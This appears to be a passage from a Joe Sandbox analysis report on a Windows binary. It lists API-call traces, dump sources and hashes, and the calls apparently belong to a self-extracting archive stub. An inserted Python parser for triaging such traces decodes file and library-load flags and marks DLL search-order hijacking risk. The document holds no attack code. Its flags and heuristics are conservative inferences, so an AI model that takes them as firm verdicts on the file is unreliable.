                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E4AC66
                                                                                                                    • SHGetMalloc.SHELL32(00E78438), ref: 00E4AC70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                    • Opcode ID: f61c47c6b8d4d5b23ce4e4ff5758d80303ac948ebf8e0554d55240d4d5a3f4a0
                                                                                                                    • Instruction ID: 5a584bbd681201e24e2911d2ef731cbcd41f3cc41989d9540796445145e51e4f
                                                                                                                    • Opcode Fuzzy Hash: f61c47c6b8d4d5b23ce4e4ff5758d80303ac948ebf8e0554d55240d4d5a3f4a0
                                                                                                                    • Instruction Fuzzy Hash: 4DF0F9B5900209AFCB10AFAAD9499AFFBFCEF94700F00415BA815B2251DBB456058BA1

                                                                                                                     Control-flow Graph (rendered image; legend: Executed / Not Executed). Function at 00E398E0: CreateFileW (00E3994B); on failure GetLastError and a call to 00E3BB03 (00E3996C), then a second CreateFileW with GetLastError (00E39990); SetFileTime (00E399E5); internal calls to 00E4EC50, 00E36EDB and 00E40602.
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E37760,?,00000005,?,00000011), ref: 00E3995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E3996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E37760,?,00000005,?), ref: 00E399A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0
                                                                                                                    • Opcode ID: e75432360d31bd7ee364cbea27bb0078b3bcffd56b70d300f247c832fbde818f
                                                                                                                    • Instruction ID: fa20468aa18e3af9472b639da72aa85df3c465c0079d68b2cc107ebc7cf2cbee
                                                                                                                    • Opcode Fuzzy Hash: e75432360d31bd7ee364cbea27bb0078b3bcffd56b70d300f247c832fbde818f
                                                                                                                    • Instruction Fuzzy Hash: 073104305447456FE7309F24DC8ABDABFD4BB84324F101B19F9A1A61D2D7F4A948CB91
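The "APIs" lists are the part of each function record a triager reads first, but Joe Sandbox prints every argument as a raw 8-digit hex word, uses `?` for values it could not resolve, and keeps listing stack words past the callee's real parameter count (CreateFileW takes seven parameters; the line at 00E3995F shows sixteen). The following Python is an added example, not part of this report or of Joe Sandbox: it parses lines in the format shown above, decodes the CreateFileW disposition and flag words and LoadLibraryEx* flag words against the documented Win32 constants, marks LoadLibrary* calls whose module argument is unresolved or not an absolute path (DLL search-order hijacking cannot be ruled out from the log alone), and spots the CreateFileW / GetLastError / CreateFileW retry seen in the function at 00E398E0. The sample input is copied from the lines above; the parameter positions assume the documented x86 stdcall argument order, and the line regex assumes the bullet-and-`ref:` layout as rendered here.

```python
"""Parse Joe Sandbox 'APIs' lines and decode the arguments a triager looks at first."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: API lines copied from the function records above. Values are
# 8-digit hex words, '?' when unresolved, and the list runs past the real arity.
SAMPLE = """\
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E37760,?,00000005,?,00000011), ref: 00E3995F
• GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E3996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E37760,?,00000005,?), ref: 00E399A2
• GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399F9
  • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
• FreeLibrary.KERNEL32(00000000,?,?,?,00E53C35,?,?,00E92088,00000000,?,00E53D60,00000004,InitializeCriticalSectionEx,00E66394,InitializeCriticalSectionEx,00000000), ref: 00E53C03
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEXWORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented Win32 constants (winbase.h / libloaderapi.h).
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00000080: "FILE_ATTRIBUTE_NORMAL"}
LOAD_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
              0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x100: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
              0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # argument tokens exactly as printed
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # callee address on 'Part of subcall function' lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("module"),
                             args=[a.strip() for a in m.group("args").split(",")],
                             ref=int(m.group("ref"), 16),
                             subcall=int(sub, 16) if sub else None))
    return calls


def _word(tok: str) -> Optional[int]:
    """Numeric value of a resolved hex word; None for '?' or for text tokens."""
    return int(tok, 16) if HEXWORD.match(tok) else None


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every known bit in table order; leftover bits become a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known
    if rest:
        names.append(f"0x{rest:X}")
    return names


def _is_absolute(path: str) -> bool:
    return (len(path) > 2 and path[1] == ":" and path[2] == "\\") or path.startswith("\\\\")


def describe(call: ApiCall) -> dict:
    """Decode the parameters that matter for triage; everything else stays raw.
    Positions follow the documented prototypes: CreateFileW(name, access, share,
    security, disposition, flags, template); LoadLibraryExW(name, reserved, flags)."""
    out = {"api": call.api, "ref": f"{call.ref:08X}"}
    if call.api == "CreateFileW":
        disp, flags = _word(call.args[4]), _word(call.args[5])
        out["disposition"] = "?" if disp is None else CREATION_DISPOSITION.get(disp, f"0x{disp:X}")
        out["flags"] = ["?"] if flags is None else decode_flags(flags, FILE_FLAGS)
    elif call.api.startswith("LoadLibrary"):
        name = call.args[0]
        # '?' means the sandbox could not resolve the string. An unresolved or
        # relative module name leaves search-order hijacking unexcluded by the log.
        out["hijack_risk"] = name == "?" or not _is_absolute(name)
        # DLL names that Joe printed from the surrounding stack are useful context.
        out["context_names"] = [a for a in call.args if a.lower().endswith(".dll")]
        if call.api.startswith("LoadLibraryEx"):
            fl = _word(call.args[2])
            out["flags"] = ["?"] if fl is None else decode_flags(fl, LOAD_FLAGS)
    return out


def find_retries(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """CreateFileW immediately retried after GetLastError (the pattern at 00E398E0)."""
    return [(f"{a.ref:08X}", f"{c.ref:08X}")
            for a, b, c in zip(calls, calls[1:], calls[2:])
            if a.api == "CreateFileW" and b.api == "GetLastError" and c.api == "CreateFileW"]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(describe(c))
    print("CreateFileW retries:", find_retries(parsed))
```

The first CreateFileW above decodes to OPEN_EXISTING with FILE_FLAG_SEQUENTIAL_SCAN, which is consistent with a read of an existing file rather than a drop; the LoadLibraryW line shows why the check is conservative: the module argument itself is unresolved, and "Crypt32.dll" only appears in the stack context, so the log alone does not prove a full system path was used even though GetSystemDirectoryW precedes the call.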

                                                                                                                     Control-flow Graph (rendered image; legend: Executed / Not Executed). Function at 00E4B568: PeekMessageW (00E4B568), GetMessageW (00E4B583), IsDialogMessageW (00E4B599), TranslateMessage and DispatchMessageW (00E4B5A8).
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                    • IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0
                                                                                                                    • Opcode ID: 26419ff562f64bbb2eb8279dacfca854fba960c3ed3c0c3c9f47377c701eeb5b
                                                                                                                    • Instruction ID: fa57f78fe31fe22491fcc50fdd7f0998a8564636f8285b8fd50e20d7fbc10307
                                                                                                                    • Opcode Fuzzy Hash: 26419ff562f64bbb2eb8279dacfca854fba960c3ed3c0c3c9f47377c701eeb5b
                                                                                                                    • Instruction Fuzzy Hash: 8CF06D71A0121AAF8B209BF6AC4DDDBBFBCEF056957404416B519E2050EB78D609CBB0

                                                                                                                     Control-flow Graph (rendered image; legend: Executed / Not Executed). Function at 00E4ABAB: GetClassNameW (00E4ABAB), call to 00E41FBB (00E4ABCC), FindWindowExW (00E4ABE3), SHAutoComplete (00E4ABF6).
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00E4ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E4ABF9
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E4ABE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: 3fad67910258606defafe6eabb30710f8b44715e1961c854412f85146c53005d
                                                                                                                    • Instruction ID: fe766d052ffda82931610a43ec3158cde3c9b50cacdbd58144ab76f8d40d0a7b
                                                                                                                    • Opcode Fuzzy Hash: 3fad67910258606defafe6eabb30710f8b44715e1961c854412f85146c53005d
                                                                                                                    • Instruction Fuzzy Hash: 4FF082327412287ADB305A25AC0AF9B76AC9F46B50F484063BA05F61C0D760EE4585B6

                                                                                                                     Control-flow Graph
                                                                                                                     control_flow_graph 1073 e4dbde-e4dc09 call e4ec50 SetEnvironmentVariableW call e40371 1077 e4dc0e-e4dc12 1073->1077 1078 e4dc14-e4dc18 1077->1078 1079 e4dc36-e4dc38 1077->1079 1080 e4dc21-e4dc28 call e4048d 1078->1080 1083 e4dc1a-e4dc20 1080->1083 1084 e4dc2a-e4dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E4DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E4DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: ec1dd11593f3fe231144adb55831454e990680d428601e6a2b3c2ffe4e3ddca9
                                                                                                                    • Instruction ID: 65e26d0535a20c871489fdaf4592d8bc7f0e838b34cd4bcf0a3315910450b59e
                                                                                                                    • Opcode Fuzzy Hash: ec1dd11593f3fe231144adb55831454e990680d428601e6a2b3c2ffe4e3ddca9
                                                                                                                    • Instruction Fuzzy Hash: F1F0A7B25052246ACB201F95BC46BFB7B98AF067C1B041411FD85B6152D6F08940D6A0

                                                                                                                     Control-flow Graph
                                                                                                                     control_flow_graph 1085 e39785-e39791 1086 e39793-e3979b GetStdHandle 1085->1086 1087 e3979e-e397b5 ReadFile 1085->1087 1086->1087 1088 e39811 1087->1088 1089 e397b7-e397c0 call e398bc 1087->1089 1090 e39814-e39817 1088->1090 1093 e397c2-e397ca 1089->1093 1094 e397d9-e397dd 1089->1094 1093->1094 1095 e397cc 1093->1095 1096 e397df-e397e8 GetLastError 1094->1096 1097 e397ee-e397f2 1094->1097 1098 e397cd-e397d7 call e39785 1095->1098 1096->1097 1099 e397ea-e397ec 1096->1099 1100 e397f4-e397fc 1097->1100 1101 e3980c-e3980f 1097->1101 1098->1090 1099->1090 1100->1101 1103 e397fe-e39807 GetLastError 1100->1103 1101->1090 1103->1101 1105 e39809-e3980a 1103->1105 1105->1098
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E39795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E397AD
                                                                                                                    • GetLastError.KERNEL32 ref: 00E397DF
                                                                                                                    • GetLastError.KERNEL32 ref: 00E397FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: cd53c66b8c03f0a497ef58059c8cfb60ebbc6a097099c830a043f99b356a4dd8
                                                                                                                    • Instruction ID: 745668726975221864c187ea305e9b19621905fe6bd2a01a289375ddb6a613da
                                                                                                                    • Opcode Fuzzy Hash: cd53c66b8c03f0a497ef58059c8cfb60ebbc6a097099c830a043f99b356a4dd8
                                                                                                                    • Instruction Fuzzy Hash: F011C231914204EBCF245F35D80CAAA3FA9FB82364F10952AF416B51D2D7F48E48DB61
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E53F73,00000000,00000000,?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue), ref: 00E5AD66
                                                                                                                    • GetLastError.KERNEL32(?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue,00E67970,FlsSetValue,00000000,00000364,?,00E598B7), ref: 00E5AD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue,00E67970,FlsSetValue,00000000), ref: 00E5AD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: f12eb6c73058e96a1815d4d2da16cefb6f66db7ba52abedeb18d22de1c6d3565
                                                                                                                    • Instruction ID: b664287ee9d0980668875e84149b7ab1e8c66a1b14bde7071ad15e34716c1ab2
                                                                                                                    • Opcode Fuzzy Hash: f12eb6c73058e96a1815d4d2da16cefb6f66db7ba52abedeb18d22de1c6d3565
                                                                                                                    • Instruction Fuzzy Hash: D6012432201226AFC7216E79AC44A977B78AF447AB7191B30FD06F3560C720C80CC7E1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E597E5: GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                      • Part of subcall function 00E597E5: _free.LIBCMT ref: 00E5981C
                                                                                                                      • Part of subcall function 00E597E5: SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                      • Part of subcall function 00E597E5: _abort.LIBCMT ref: 00E59863
                                                                                                                      • Part of subcall function 00E5BB4E: _abort.LIBCMT ref: 00E5BB80
                                                                                                                      • Part of subcall function 00E5BB4E: _free.LIBCMT ref: 00E5BBB4
                                                                                                                      • Part of subcall function 00E5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E5BA44,?), ref: 00E5B7E6
                                                                                                                    • _free.LIBCMT ref: 00E5BA9F
                                                                                                                    • _free.LIBCMT ref: 00E5BAD5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 2991157371-2678736219
                                                                                                                    • Opcode ID: 2a3b81022c5737c53138bb67dd087b3d01f6a63c3584fc257f4b795b60f37c5f
                                                                                                                    • Instruction ID: 530a08ac9986511dc3991a7b42c180af950e5d3041d7afb258db2cfdc94013b7
                                                                                                                    • Opcode Fuzzy Hash: 2a3b81022c5737c53138bb67dd087b3d01f6a63c3584fc257f4b795b60f37c5f
                                                                                                                    • Instruction Fuzzy Hash: 74312731900209AFDB10EFA9D441B9DB7F5EF40326F21589AEC04BB2A3EB725D48CB50
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: ($PDu<
                                                                                                                    • API String ID: 1269201914-2719109745
                                                                                                                    • Opcode ID: d4d691c59c41e946a56c743e0015ff4016318cf3121ad808b321a69ab58ee8fe
                                                                                                                    • Instruction ID: 53edf94467aa68d14482e971276ff5668dff1b8ae7dfd7023b502f5bb16a4ca9
                                                                                                                    • Opcode Fuzzy Hash: d4d691c59c41e946a56c743e0015ff4016318cf3121ad808b321a69ab58ee8fe
                                                                                                                    • Instruction Fuzzy Hash: 89B012C16981407C390861197D03C7F454DD4C5F10330B02EF405F0680E8811C010532
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 2$PDu<
                                                                                                                    • API String ID: 1269201914-683690134
                                                                                                                    • Opcode ID: 73b994899727c5eefab80e8ea20ff8c209646d2977440b92e52c199a6b9bce84
                                                                                                                    • Instruction ID: 678ecc747c43b8668b9d7585e35119373feaf38d0aec9c847fa1b9df8749876f
